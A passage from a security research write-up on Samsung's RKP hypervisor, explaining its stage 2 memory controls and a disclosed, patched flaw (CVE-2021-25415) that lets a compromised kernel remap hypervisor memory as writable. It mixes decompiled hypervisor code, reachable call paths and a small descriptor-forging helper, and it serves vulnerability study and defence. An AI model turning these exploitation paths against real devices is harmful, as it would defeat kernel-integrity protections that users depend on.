Disclaimer
This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.
This is a follow-up to our compendium blog post that presented the internals of Samsung's security hypervisor, including all the nitty-gritty details. This extensive knowledge is put to use in today's blog post that explains how we attacked Samsung RKP. After revealing three vulnerabilities leading to the compromise of the hypervisor or of its assurances, we also describe the exploitation paths we came up with. Finally, we take a look at the patches made by Samsung following our report.
In January 2021, we reported three vulnerabilities in Samsung's security hypervisor implementation. Each of the vulnerabilities has a different impact, from writing to hypervisor-enforced read-only memory to compromising the hypervisor itself. The vulnerabilities were fixed in the June 2021 and October 2021 security updates. While they are specific to Samsung RKP, we think that they are good examples of what you should be keeping an eye out for if you're auditing a security hypervisor running on an ARMv8 device.
We will detail each of the vulnerabilities, explain how they can be exploited, and also take a look at their patch. While we recommend reading the original blog post because it will make it easier to understand this one, we tried to summarize all the important bits in the introduction. Feel free to skip the introduction and go directly to the first vulnerability if you are already familiar with Samsung RKP.
The main goal of a security hypervisor on a mobile device is to ensure kernel integrity at run time, so that even if an attacker finds a kernel vulnerability, they won't be able to modify sensitive kernel data structures, elevate privileges, or execute malicious code. In order to do that, the hypervisor is executing at a higher privilege level (EL2) than the kernel (EL1), and it can have complete control over it by making use of the virtualization extensions.
One of the features of the virtualization extensions is a second layer of address translation. When it is disabled, there is only one layer of address translation, which translates a Virtual Address (VA) directly into a Physical Address (PA). But when it is enabled, the first layer (stage 1 - under control of the kernel) now translates a VA into what is called an Intermediate Physical Address (IPA), and the second layer (stage 2 - under control of the hypervisor) translates this IPA into the real PA. This second layer has its own memory attributes, allowing the hypervisor to enforce memory permissions that differ from the ones in the kernel page tables as well as disable access to some physical memory regions.
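To make the interplay between the two stages concrete, here is a simplified illustration (not actual hypervisor code): the effective access rights to a page are essentially the intersection of what the kernel grants at stage 1 and what the hypervisor grants at stage 2.

/* Simplified model (illustration only): the effective permission on a page is
 * the intersection of the stage 1 permissions (kernel-controlled) and the
 * stage 2 permissions (hypervisor-controlled). */
enum perm { PERM_R = 1 << 0, PERM_W = 1 << 1, PERM_X = 1 << 2 };

int effective_perms(int stage1_perms, int stage2_perms) {
    return stage1_perms & stage2_perms;
}

/* Even if the kernel maps a page as read-write at stage 1, if the hypervisor
 * only allows reads at stage 2, the page is effectively read-only:
 * effective_perms(PERM_R | PERM_W, PERM_R) == PERM_R. */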
Another feature of the virtualization extensions, enabled by the use of the Hypervisor Configuration Register (HCR), allows the hypervisor to handle general exceptions and to trap critical operations usually performed by the kernel (such as accessing system registers). Finally, in the cases where the kernel (EL1) needs to call into the hypervisor (EL2), it can do so by executing a HyperVisor Call (HVC) instruction. This is very similar to the SuperVisor Call (SVC) instruction that is used by userland processes (EL0) to call into the kernel (EL1).
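To give an idea of what this looks like in practice, below is a rough sketch of a kernel-side helper issuing an HVC. This is not Samsung's actual uh_call implementation: the use of registers x0-x3 and of "hvc #0" are assumptions based on the usual AArch64 calling pattern.

/* Hypothetical kernel-side hypervisor call helper (sketch). We assume the
 * application ID, command ID and arguments are passed in x0-x3 and that the
 * hypervisor is entered with "hvc #0"; the real uh_call may differ. */
static inline unsigned long hyp_call(unsigned long app_id, unsigned long cmd_id,
                                     unsigned long arg0, unsigned long arg1) {
    register unsigned long x0 asm("x0") = app_id;
    register unsigned long x1 asm("x1") = cmd_id;
    register unsigned long x2 asm("x2") = arg0;
    register unsigned long x3 asm("x3") = arg1;
    asm volatile("hvc #0" : "+r"(x0) : "r"(x1), "r"(x2), "r"(x3) : "memory");
    return x0; /* value returned by the hypervisor */
}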
Samsung's implementation of a security hypervisor enforces that:
- the kernel page tables cannot be modified directly (they are made read-only in the stage 2);
- on the page tables mapping user space memory, the PXNTable bit is set;
- critical kernel data is moved to the .rodata region (read-only);
- sensitive data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages;
- a task that is not system cannot suddenly become system or root;
- as a result, an attacker cannot simply overwrite the cred field of a task_struct in an exploit;
- binaries cannot be executed as root from outside of specific mount points.

Samsung RKP makes extensive use of two data structures: memlists and sparsemaps.

- A memlist is a list of memory regions (similar to a std::vector).
- A sparsemap associates a value with each page of a set of memory regions (similar to a std::map).

There are multiple instances of these control structures, listed below by order of initialization:
- dynamic_regions contains the DRAM regions (sent by S-Boot);
- protected_ranges contains critical hypervisor SRAM/DRAM regions;
- physmap associates a type (kernel text, PT, etc.) to each DRAM page;
- ro_bitmap indicates if a DRAM page is read-only in the stage 2;
- dbl_bitmap is used by the kernel to detect double-mapped DRAM pages;
- page_allocator.list contains the DRAM region used by RKP's page allocator;
- page_allocator.map tracks DRAM pages allocated by RKP's page allocator;
- executable_regions contains the kernel's executable pages;
- dynamic_load_regions is used by the "dynamic load" feature.

Please note that these control structures are used by the hypervisor to keep track of what is in memory and how it is mapped. But they have no direct impact on the actual address translation (unlike the stage 2 page tables). The hypervisor has to carefully keep the control structures and page tables in sync to avoid issues.
The hypervisor has multiple allocators, each serving a different purpose: a "static heap" allocator, a "dynamic heap" allocator, and a page allocator.
The initialization of the hypervisor (alongside the kernel) is detailed in the first blog post. It is crucial when looking for vulnerabilities to know what the state of the various control structures is at a given moment, as well as what the page tables for the stage 2 at EL1 and stage 1 at EL2 contain. The hypervisor state after initialization is reported below.
The control structures are as follows:
- The protected_ranges contain the hypervisor code/data and the memory backing the physmap.
- In the physmap:
  - the kernel .text segment is marked as TEXT;
  - the level 1, 2, and 3 user page tables are marked as L1, L2, and L3, respectively;
  - the level 1, 2, and 3 kernel page tables are marked as KERNEL|L1, KERNEL|L2, and KERNEL|L3, respectively.
- The ro_bitmap contains the kernel .text and .rodata segments, and other pages that have been made read-only in the stage 2 (like the L1, L2, and some of the L3 kernel page tables).
- The executable_regions contain the kernel .text segment and the trampoline page.

In the page tables of the EL2 stage 1 (controlling what the hypervisor can access):

- the kernel .text segment is mapped as RO;
- the kernel's swapper_pg_dir is mapped as RW.

In the page tables of the EL1 stage 2 (controlling what the kernel can really access):

- the empty_zero_page is mapped as RWX;
- only pages that are part of the executable_regions can be mapped as executable;
- the kernel .text segment is mapped as ROX.

Our test device during this research was a Samsung Galaxy A51 (SM-A515F). Instead of using a full exploit chain, we have downloaded the kernel source code from Samsung's Open Source website, added a few syscalls, recompiled the kernel, and flashed it onto the device.
The new syscalls make it really convenient to interact with RKP and allow us from userland to:
- read and write kernel memory;
- allocate kernel memory;
- make hypervisor calls (by calling the uh_call function).

SVE-2021-20178 (CVE-2021-25415): Possible remapping RKP memory as writable from EL1
Severity: High
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable.
The patch adds the proper address validation in RKP to prevent change of EL2 memory attribution from EL1.
When Samsung RKP needs to change the permissions of a memory region in the stage 2, it uses either rkp_s2_page_change_permission
which operates on a single page, or rkp_s2_range_change_permission
which operates on a range of addresses. These functions can be abused to remap hypervisor memory (that was unmapped during initialization) as writable from the kernel, thus fully compromising the security hypervisor. Let's see what happens under the hood when these functions are called.
rkp_s2_page_change_permission
starts by performing verifications on its arguments: unless the allow
flag is non-zero, the hypervisor must be initialized, the page must not be marked as S2UNMAP
in the physmap
, it must not come from the hypervisor page allocator, and it cannot be in the kernel .text
or .rodata
sections. If these verifications succeed, it determines the requested memory attributes and calls map_s2_page
to effectively modify the stage 2 page tables. Finally, it flushes the TLBs and updates the writability of the page in the ro_bitmap
.
int64_t rkp_s2_page_change_permission(void* p_addr, uint64_t access, uint32_t exec, uint32_t allow) {
// ...
// If the allow flag is 0, RKP must be initialized.
if (!allow && !rkp_inited) {
uh_log('L', "rkp_paging.c", 574, "s2 page change access not allowed before init %d", allow);
rkp_policy_violation("s2 page change access not allowed, p_addr : %p", p_addr);
return -1;
}
// The page shouldn't be marked as `S2UNMAP` in the physmap.
if (is_phys_map_s2unmap(p_addr)) {
// And trigger a violation.
rkp_policy_violation("Error page was s2 unmapped before %p", p_addr);
return -1;
}
// The page shouldn't have been allocated by the hypervisor page allocator.
if (page_allocator_is_allocated(p_addr) == 1) {
return 0;
}
// The page shouldn't be in the kernel text section.
if (p_addr >= TEXT_PA && p_addr < ETEXT_PA) {
return 0;
}
// The page shouldn't be in the kernel rodata section.
if (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)) {
return 0;
}
uh_log('L', "rkp_paging.c", 270, "Page access change out of static RO range %lx %lx %lx", p_addr, access, exec);
// Calculate the memory attributes to apply to the page.
if (access == 0x80) {
++page_ro;
attrs = UNKN1 | READ;
} else {
++page_free;
attrs = UNKN1 | WRITE | READ;
}
if (p_addr == ZERO_PG_ADDR || exec) {
attrs |= EXEC;
}
// Call `map_s2_page` to make the actual changes to the stage 2 page tables.
if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
return -1;
}
// Invalidate the TLBs for the target page.
tlbivaae1is(((p_addr + 0x80000000) | 0xffffffc000000000) >> 12);
// Call `rkp_set_pgt_bitmap` to update the ro_bitmap.
return rkp_set_pgt_bitmap(p_addr, access);
}
rkp_s2_range_change_permission
operates similarly to rkp_s2_page_change_permission
. The first differences are the verifications performed by the function. Here the allow
flag can take 3 values: 0 (changes are only allowed after initialization), 1 (only before deferred initialization), and 2 (always allowed). The start and end address must be page aligned and in the expected order. No other verifications are performed. The second difference is the function called to perform the changes to the stage 2 page tables, which is s2_map
and not map_s2_page
.
int64_t rkp_s2_range_change_permission(uint64_t start_addr,
uint64_t end_addr,
uint64_t access,
uint32_t exec,
uint32_t allow) {
// ...
uh_log('L', "rkp_paging.c", 195, "RKP_4acbd6db%lxRKP_00950f15%lx", start_addr, end_addr);
// If the allow flag is 0, RKP must be initialized.
if (!allow && !rkp_inited) {
uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
rkp_policy_violation("Range change permission prohibited");
}
// If the allow flag is 1, RKP must not be deferred initialized.
else if (allow != 2 && rkp_deferred_inited) {
uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
rkp_policy_violation("Range change permission prohibited");
}
// The start and end addresses must be page-aligned.
if ((start_addr & 0xfff) != 0 || (end_addr & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 203, "start or end addr is not aligned, %p - %p", start_addr, end_addr);
return -1;
}
// The start address must be smaller than the end address.
if (start_addr > end_addr) {
uh_log('L', "rkp_paging.c", 208, "start addr is bigger than end addr %p, %p", start_addr, end_addr);
return -1;
}
// Calculates the memory attributes to apply to the pages.
size = end_addr - start_addr;
if (access == 0x80) {
attrs = UNKN1 | READ;
} else {
attrs = UNKN1 | WRITE | READ;
}
if (exec) {
attrs |= EXEC;
}
p_addr_start = start_addr;
// Call `s2_map` to make the actual changes to the stage 2 page tables.
if (s2_map(start_addr, end_addr - start_addr, attrs, &p_addr_start) < 0) {
uh_log('L', "rkp_paging.c", 222, "s2_map returned false, p_addr_start : %p, size : %p", p_start_addr, size);
return -1;
}
// For each page, call `rkp_set_pgt_bitmap` to update the ro_bitmap and invalidate the TLBs.
for (addr = start_addr; addr < end_addr; addr += 0x1000) {
res = rkp_set_pgt_bitmap(addr, access);
if (res < 0) {
uh_log('L', "rkp_paging.c", 229, "set_pgt_bitmap fail, %p", addr);
return res;
}
tlbivaae1is(((addr + 0x80000000) | 0xffffffc000000000) >> 12);
}
return 0;
}
s2_map
is a wrapper around map_s2_page
that takes into account the various block and page sizes that make up the memory range. map_s2_page
does not use any of the control structures. It won't be detailed in this blog post as it is generic code for walking and updating the stage 2 page tables.
int64_t s2_map(uint64_t orig_addr, uint64_t orig_size, attrs_t attrs, uint64_t* paddr) {
// ...
if (!paddr) {
return -1;
}
// Floor the address to the page size.
addr = orig_addr - (orig_addr & 0xfff);
// And ceil the size to the page size.
size = (orig_addr & 0xfff) + orig_size;
// Call `map_s2_page` for each 2 MB block in the region.
while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
if (map_s2_page(*paddr, addr, 0x200000, attrs)) {
uh_log('L', "s2.c", 1132, "unable to map 2mb s2 page: %p", addr);
return -1;
}
size -= 0x200000;
addr += 0x200000;
*paddr += 0x200000;
}
// Call `map_s2_page` for each 4 KB page in the region.
while (size > 0xfff && (addr & 0xfff) == 0) {
if (map_s2_page(*paddr, addr, 0x1000, attrs)) {
uh_log('L', "s2.c", 1150, "unable to map 4kb s2 page: %p", addr);
return -1;
}
size -= 0x1000;
addr += 0x1000;
*paddr += 0x1000;
}
return 0;
}
We have seen that the rkp_s2_range_change_permission
function performs fewer verifications than rkp_s2_page_change_permission
. In particular, it doesn't ensure that the pages of the memory range are not marked as S2UNMAP
in the physmap
. That means that if we give it a memory range that contains hypervisor memory (unmapped during initialization), it will happily remap it in the second stage.
But it turns out that it is even worse than that: this check doesn't even do anything! One would expect a page to be marked as S2UNMAP
in the physmap
when it is actually unmapped from stage 2. s2_unmap
is the function that does this unmapping. Similarly to s2_map
, it is simply a wrapper around unmap_s2_page
that takes into account the various block and page sizes that make up the memory range.
int64_t s2_unmap(uint64_t orig_addr, uint64_t orig_size) {
// ...
// Floor the address to the page size.
addr = orig_addr & 0xfffffffffffff000;
// And ceil the size to the page size.
size = (orig_addr & 0xfff) + orig_size;
// Call `unmap_s2_page` for each 1 GB block in the region.
while (size > 0x3fffffff && (addr & 0x3fffffff) == 0) {
if (unmap_s2_page(addr, 0x40000000)) {
uh_log('L', "s2.c", 1175, "unable to unmap 1gb s2 page: %p", addr);
return -1;
}
size -= 0x40000000;
addr += 0x40000000;
}
// Call `unmap_s2_page` for each 2 MB block in the region.
while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
if (unmap_s2_page(addr, 0x200000)) {
uh_log('L', "s2.c", 1183, "unable to unmap 2mb s2 page: %p", addr);
return -1;
}
size -= 0x200000;
addr += 0x200000;
}
// Call `unmap_s2_page` for each 4 KB page in the region.
while (size > 0xfff && (addr & 0xfff) == 0) {
if (unmap_s2_page(addr, 0x1000)) {
uh_log('L', "s2.c", 1191, "unable to unmap 4kb s2 page: %p", addr);
return -1;
}
size -= 0x1000;
addr += 0x1000;
}
return 0;
}
It turns out there are no calls to rkp_phys_map_set
, rkp_phys_map_set_region
, or even the low-level sparsemap_set_value_addr
function that ever mark a page as S2UNMAP
. Consequently, we can also use rkp_s2_page_change_permission
to remap hypervisor memory in the stage 2!
To exploit this two-fold bug, we need to look for calls to the rkp_s2_page_change_permission
and rkp_s2_range_change_permission
functions that can be triggered from the kernel (after the hypervisor has been initialized) and with controllable arguments.
rkp_s2_page_change_permission is called:

- in rkp_l1pgt_process_table;
- in rkp_l2pgt_process_table;
- in rkp_l3pgt_process_table;
- in set_range_to_pxn_l3 (itself called from rkp_set_range_to_pxn);
- in set_range_to_rox_l3 (itself called from rkp_set_range_to_rox);
- in rkp_set_pages_ro;
- in rkp_ro_free_pages.

And rkp_s2_range_change_permission is called:

- in the dynamic_load_xxx functions.

Let's go over these functions one by one and see if they fit our requirements.
rkp_lxpgt_process_table
In the first blog post, we took a closer look at the functions rkp_l1pgt_process_table
, rkp_l2pgt_process_table
and rkp_l3pgt_process_table
. It is fairly easy to reach the call to rkp_s2_page_change_permission
in these functions, assuming that we control the third argument:
- if is_alloc is equal to 1, the page must not be marked as LX in the physmap; it is then made read-only in the stage 2 and marked as LX.
- if is_alloc is equal to 0, the page must be marked as LX in the physmap; it is then made writable in the stage 2 and marked as FREE.

So by calling one of these functions twice, the first time with is_alloc
set to 1, and the second time with is_alloc
set to 0, it will result in a call to rkp_s2_page_change_permission
with read-write permissions. The next question is: can we call these functions with controlled arguments?
The function processing the level 1 tables, rkp_l1pgt_process_table
, is called:

- in rkp_l1pgt_ttbr;
- in rkp_l1pgt_new_pgd;
- in rkp_l1pgt_free_pgd.

The first call is in rkp_l1pgt_ttbr
, where the function arguments, ttbr
and user_or_kernel
, are user-controlled. Because we're attacking Samsung RKP after initialization, rkp_deferred_inited
and rkp_inited
should be true, and the MMU enabled. Then, if pgd
is the user PGD empty_zero_page
or a kernel PGD other than swapper_pg_dir
and tramp_pg_dir
, the rkp_l1pgt_process_table
function will be called.
int64_t rkp_l1pgt_ttbr(uint64_t ttbr, uint32_t user_or_kernel) {
// ...
// Extract the PGD from the TTBR system register value.
pgd = ttbr & 0xfffffffff000;
// Don't do any processing if RKP is not deferred initialized.
if (!rkp_deferred_inited) {
should_process = 0;
} else {
should_process = 1;
// For kernel PGDs or user PGDs that aren't `empty_zero_page`.
if (user_or_kernel == 0x1ffffff || pgd != ZERO_PG_ADDR) {
// Don't do any processing if RKP is not initialized.
if (!rkp_inited) {
should_process = 0;
}
// Or if it's the `swapper_pg_dir` kernel PGD.
if (pgd == INIT_MM_PGD) {
should_process = 0;
}
// Or if it's the `tramp_pg_dir` kernel PGD.
if (pgd == TRAMP_PGD && TRAMP_PGD) {
should_process = 0;
}
}
// For the `empty_zero_page` user PGD.
else {
// Don't do any processing if the MMU is disabled or RKP is not initialized.
if ((get_sctlr_el1() & 1) != 0 || !rkp_inited) {
should_process = 0;
}
}
}
// If processing of the PGD should be done, call `rkp_l1pgt_process_table`.
if (should_process && rkp_l1pgt_process_table(pgd, user_or_kernel, 1) < 0) {
return rkp_policy_violation("Process l1t returned false, l1e addr : %lx", pgd);
}
// Then set TTBR0_EL1 for user PGDs, or TTBR1_EL1 for kernel PGDs.
if (!user_or_kernel) {
return set_ttbr0_el1(ttbr);
} else {
return set_ttbr1_el1(ttbr);
}
}
However, the function will also set the system register TTBR0_EL1
(for user PGDs) or TTBR1_EL1
(for kernel PGDs), and we don't even have control of the is_alloc
argument, so this is not a good path. Let's take a look at our other options.
We have seen the rkp_l1pgt_new_pgd
and rkp_l1pgt_free_pgd
functions in the first blog post. They could have been very good candidates, but there is one major drawback to using them: the table address given to rkp_l1pgt_process_table
comes from rkp_get_pa
. This function calls check_kernel_input
to ensure the address is not in the protected_ranges
memlist, so we can't use addresses located in hypervisor memory.
Instead, what we can do is try to reach the processing of the next level table so that the value given to rkp_l2pgt_process_table
comes from a descriptor's output address and not from a call to rkp_get_pa
. This way, the table address argument will be fully user-controlled.
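Concretely, all that the planted level 1 descriptor needs is the table type bits (0b11) and an output address pointing at our target; the hypervisor extracts the next-level table with the 0xfffffffff000 mask, as seen in the code excerpts in this post. A minimal sketch:

/* Forge a level 1 table descriptor whose output address we fully control
 * (sketch). RKP extracts the next-level table with `desc & 0xfffffffff000`
 * before passing it to rkp_l2pgt_process_table, so only the type bits and
 * the output address matter here. */
uint64_t forge_l1_table_desc(uint64_t target_pa) {
    return (target_pa & 0xfffffffff000) | 0b11; /* 0b11 = table descriptor */
}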
The function processing the level 2 tables, rkp_l2pgt_process_table, is called:

- in rkp_l1pgt_process_table;
- in rkp_l1pgt_write (seen in the first blog post).

And the function processing the level 3 tables, rkp_l3pgt_process_table, is called:

- in check_single_l2e (seen in the first blog post, called from rkp_l2pgt_process_table and rkp_l2pgt_write).

The rkp_l1pgt_write and rkp_l2pgt_write functions, which we have also seen in the first blog post, are very good candidates that allow calling rkp_l2pgt_process_table and rkp_l3pgt_process_table by writing in the kernel page tables a fake level 1 or level 2 descriptor, respectively.
For the sake of completeness, we will take a look at our other options even though we have already found an exploitation path for the vulnerability.
set_range_to_xxx_l3
set_range_to_pxn_l3 is called all the way from rkp_set_range_to_pxn. This function calls set_range_to_pxn_l1, passing it the PGD as an argument, as well as the start and end addresses of the range to set as PXN in the stage 1 page tables. It also invalidates the TLB and instruction cache.
int64_t rkp_set_range_to_pxn(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
// Call `set_range_to_pxn_l1` to walk the PGD and set PXN bit of the descriptors mapping the address range.
res = set_range_to_pxn_l1(table, start_addr, end_addr);
if (res) {
uh_log('W', "rkp_l1pgt.c", 186, "Fail to change attribute to pxn");
return res;
}
// Invalidate the TLBs for the memory region.
size = end_addr - start_addr;
invalidate_s1_el1_tlb_region(start_addr, size);
// Invalidate the instruction cache for the memory region.
paddr = rkp_get_pa(start_addr);
invalidate_instruction_cache_region(paddr, size);
return 0;
}
set_range_to_pxn_l1
ensures the PGD is marked as KERNEL|L1
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l2
on the table descriptors to process the PMDs.
int64_t set_range_to_pxn_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PGD is marked as `KERNEL|L1` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
res = 0;
// Iterate over the PGD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc = *(table + 8 * ((next_start_addr >> 30) & 0x1ff));
// If the descriptor is a table descriptor.
if ((table_desc & 0b11) == 0b11) {
// Call `set_range_to_pxn_l2` to walk the PMD and set PXN bit of the descriptors mapping the address range.
res += set_range_to_pxn_l2(table_desc & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_pxn_l2
ensures the PMD is marked as KERNEL|L2
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l3
on the table descriptors to process the PTs. In addition, if the descriptors don't map one of the executable regions, it sets their PXN bit.
int64_t set_range_to_pxn_l2(uint64_t table, uint64_t start_addr, int64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PMD is marked as `KERNEL|L2` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
res = 0;
// Iterate over the PMD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
// Check if the descriptor value is in the executable regions. If it is not, set the PXN bit of the descriptor.
// However, I believe the mask extracting only the output address of the descriptor is missing...
if (*table_desc_p && !executable_regions_contains(*table_desc_p)) {
set_pxn_bit_of_desc(table_desc_p, 2);
}
// If the descriptor is a table descriptor.
if ((*table_desc_p & 0b11) == 0b11) {
// Call `set_range_to_pxn_l3` to walk the PT and set PXN bit of the descriptors mapping the address range.
res += set_range_to_pxn_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_pxn_l3
checks if the PT is marked as KERNEL|L3
in the physmap
. If it is, the hypervisor stops protecting it by making it writable again in the second stage and marking it as FREE
in the physmap
. It then iterates over the descriptors that map the address range given as an argument, and if they don't map one of the executable regions, it sets their PXN bit.
int64_t set_range_to_pxn_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PT is marked as `KERNEL|L3` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l3(table)) {
// Call `rkp_s2_page_change_permission` to make it writable in the second stage.
res = rkp_s2_page_change_permission(table, 0 /* read-write */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 153, "pxn l3t failed, %lx", table);
rkp_phys_map_unlock(table);
return res;
}
// Mark it as `FREE` in the physmap.
res = rkp_phys_map_set(table, FREE);
if (res < 0) {
rkp_phys_map_unlock(table);
return res;
}
}
// Iterate over the PT descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
// If the descriptor is a page descriptor, and the descriptor value is not in the executable regions, then set its
// PXN bit. I believe the mask extracting only the output address of the descriptor is missing...
if ((*table_desc_p & 0b11) == 0b11 && !executable_regions_contains(*table_desc_p, 3)) {
set_pxn_bit_of_desc(table_desc_p, 3);
}
}
rkp_phys_map_unlock(table);
return 0;
}
rkp_set_range_to_pxn
is always called (from the "dynamic load" feature's functions) on swapper_pg_dir
. It will thus walk the kernel page tables and set the PXN bit of the block and page descriptors spanning over the specified address range. The call to rkp_s2_page_change_permission
that we are interested in only happens for level 3 tables that are also marked KERNEL|L3
in the physmap
.
It is not a good option for us for many reasons: our target page of hypervisor memory would need to be marked KERNEL|L3
in the physmap
; it requires that we have already written a user-controlled descriptor into the kernel page tables (bringing us back to the rkp_lxpgt_process_table
functions that we have seen above); and finally, the "dynamic load" feature is only available on Exynos devices, as we are going to see with the next vulnerability.
set_range_to_rox_l3
is called all the way from rkp_set_range_to_rox
. The rkp_set_range_to_rox
and set_range_to_rox_lx
functions are very similar to their PXN counterparts. rkp_set_range_to_rox
calls set_range_to_rox_l1
, passing it the PGD as an argument.
int64_t rkp_set_range_to_rox(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
// Call `set_range_to_rox_l1` to walk the PGD and set the regions of the address range as ROX.
res = set_range_to_rox_l1(table, start_addr, end_addr);
if (res) {
uh_log('W', "rkp_l1pgt.c", 199, "Fail to change attribute to rox");
return res;
}
// Invalidate the TLBs for the memory region.
size = end_addr - start_addr;
invalidate_s1_el1_tlb_region(start_addr, size);
// Invalidate the instruction cache for the memory region.
paddr = rkp_get_pa(start_addr);
invalidate_instruction_cache_region(paddr, size);
return 0;
}
set_range_to_rox_l1
ensures the PGD is swapper_pg_dir (triggering a policy violation otherwise)
and is marked as KERNEL|L1
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l2
to process the PMDs.
int64_t set_range_to_rox_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
if (table != INIT_MM_PGD) {
rkp_policy_violation("rox only allowed on kerenl PGD! l1t : %lx", table);
return -1;
}
rkp_phys_map_lock(table);
// Ensure the PGD is marked as `KERNEL|L1` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
res = 0;
// Iterate over the PGD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 30) & 0x1ff);
// Set the AP bits to RO and unset the PXN bit of the descriptor.
if (*table_desc_p) {
set_rox_bits_of_desc(table_desc_p, 1);
}
// If the descriptor is a table descriptor.
if ((*table_desc_p & 0b11) == 0b11) {
// Call `set_range_to_rox_l2` to walk the PMD and set the regions of the address range as ROX.
res += set_range_to_rox_l2(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_rox_l2
ensures the PMD is marked as KERNEL|L2
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l3
to process the PTs.
int64_t set_range_to_rox_l2(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PMD is marked as `KERNEL|L2` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
// Iterate over the PMD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
// Set the AP bits to RO and unset the PXN bit of the descriptor.
if (*table_desc_p) {
set_rox_bits_of_desc(table_desc_p, 2);
}
// If the descriptor is a table descriptor.
if ((*table_desc_p & 0b11) == 0b11) {
res += set_range_to_rox_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_rox_l3
checks if the PT is marked as KERNEL|L3
in the physmap
. If it is not, the hypervisor starts protecting it by making it read-only in the second stage and marking it as KERNEL|L3
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only and executable.
int64_t set_range_to_rox_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PT is NOT marked as `KERNEL|L3` in the physmap.
if (!is_phys_map_kernel(table) || !is_phys_map_l3(table)) {
// Call `rkp_s2_page_change_permission` to make it read-only in the second stage.
res = rkp_s2_page_change_permission(table, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 193, "rox l3t failed, %lx", table);
rkp_phys_map_unlock(table);
return res;
}
// Mark it as `KERNEL|L3` in the physmap.
res = rkp_phys_map_set(table, FLAG2 | KERNEL | L3);
if (res < 0) {
rkp_phys_map_unlock(table);
return res;
}
}
// Iterate over the PT descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
if (next_end_addr > end_addr) {
